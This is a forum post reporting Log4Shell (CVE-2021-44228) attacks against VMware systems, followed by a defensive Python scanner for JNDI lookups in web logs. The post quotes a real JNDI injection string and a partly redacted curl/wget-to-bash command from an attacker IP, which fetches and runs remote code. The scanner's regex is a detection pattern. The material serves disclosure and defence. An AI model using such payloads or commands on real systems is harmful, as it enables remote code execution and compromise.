VMware Communities
chris_x5
Contributor

CVE-2021-44228 exploit in the wild - issue with workaround and patches, need verification

Regarding https://www.vmware.com/security/advisories/VMSA-2021-0028.html
CVE-2021-44228

Please be aware that attackers are targeting servers also without DNS resolution.

45.155.205.233 - - [10/Dec/2021:14:23:29 +0100] "GET / HTTP/1.1" 200 300 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KG(cut_for_security)}"

Command that is sent to systems:

(curl -s 45.155.205.233:5874/(ip_cut_for_security):80||wget -q -O- 45.155.205.233:5874/(ip_cut_for_security):80)|bash


In the VMware KB https://kb.vmware.com/s/article/87086, VMware refers to traffic that comes in on the LDAP port, but as you can see above, attackers are using dynamic ports to actually perform that attack. And also they are not using DNS for lookups in 40/60 cases.

Please verify if that is consistent with your KB and protection.

Thanks.
Chris
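The point of the post above is that a detection or block rule keyed on destination port 389 or on DNS lookups misses callbacks that use an IP literal and an arbitrary port. The following is an added example, not code from the original post or from VMware: a small access-log scanner that matches the `${jndi:...}` lookup in any free-text field, extracts the callback scheme, host and port, and records whether the host is an IP literal (no DNS resolution involved) and whether the port differs from the protocol's default. The log lines in `SAMPLE_LOG` are constructed for the example (the first reuses the entry from the post, with its payload still cut; the hostname `callback.example.invalid` is a placeholder).

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional

# Apache/Nginx "combined" log format; the user agent is the last quoted field.
COMBINED_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Plain JNDI lookup: ${jndi:<scheme>://<host>[:port]/...}
JNDI_RE = re.compile(
    r'\$\{jndi:(?P<scheme>ldaps?|rmi|dns|iiop|corba|nds|http)://'
    r'(?P<host>[^:/\s}]+)(?::(?P<port>\d{1,5}))?',
    re.IGNORECASE,
)

# Default ports per scheme; used to flag callbacks on non-standard ports.
DEFAULT_PORTS = {"ldap": 389, "ldaps": 636, "rmi": 1099, "dns": 53,
                 "http": 80, "iiop": 2809, "corba": 2809, "nds": 524}


@dataclass
class Finding:
    src: str               # client that sent the request
    field: str             # which log field carried the lookup
    scheme: str
    host: str
    port: int
    host_is_ip: bool       # IP literal => no DNS lookup will occur on the victim
    nonstandard_port: bool  # port differs from the scheme's default (e.g. not 389)


def scan_line(line: str) -> Optional[Finding]:
    """Return a Finding if the log line carries a JNDI lookup, else None."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    # Check every attacker-controlled free-text field, not only the user agent.
    for field in ("req", "referer", "ua"):
        j = JNDI_RE.search(m.group(field))
        if not j:
            continue
        scheme = j.group("scheme").lower()
        host = j.group("host")
        default = DEFAULT_PORTS.get(scheme, 0)
        port = int(j.group("port")) if j.group("port") else default
        try:
            ipaddress.ip_address(host)
            host_is_ip = True
        except ValueError:
            host_is_ip = False
        return Finding(m.group("src"), field, scheme, host, port,
                       host_is_ip, port != default)
    return None


def scan_log(lines: List[str]) -> List[Finding]:
    """Scan many lines; malformed lines are skipped rather than raising."""
    findings = []
    for line in lines:
        f = scan_line(line)
        if f:
            findings.append(f)
    return findings


def summarize(findings: List[Finding]) -> dict:
    """Counts that show why port-389-only or DNS-only monitoring is insufficient."""
    return {
        "total": len(findings),
        "ip_literal_host": sum(1 for f in findings if f.host_is_ip),
        "nonstandard_port": sum(1 for f in findings if f.nonstandard_port),
    }


# Constructed sample log (first line is the post's own entry, payload still cut).
SAMPLE_LOG = [
    '45.155.205.233 - - [10/Dec/2021:14:23:29 +0100] "GET / HTTP/1.1" 200 300 "-" '
    '"${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KG(cut_for_security)}"',
    '198.51.100.9 - - [10/Dec/2021:14:24:10 +0100] "GET /index.html HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0 (compatible; constructed-benign-agent)"',
    '203.0.113.7 - - [10/Dec/2021:14:25:01 +0100] "GET /login HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://callback.example.invalid/x}"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
    print(summarize(scan_log(SAMPLE_LOG)))
```

Run as-is it prints two findings: the post's entry resolves to an IP literal on port 12344 (so neither a DNS-based nor a port-389-based control would see it), while the second constructed entry is a hostname on the default port. The pattern deliberately matches only the plain `${jndi:` form; nested-lookup obfuscations of the prefix are documented elsewhere and need a normalizing pass before this regex, so treat a zero count from this scanner as "nothing found by this rule", not as "nothing happened".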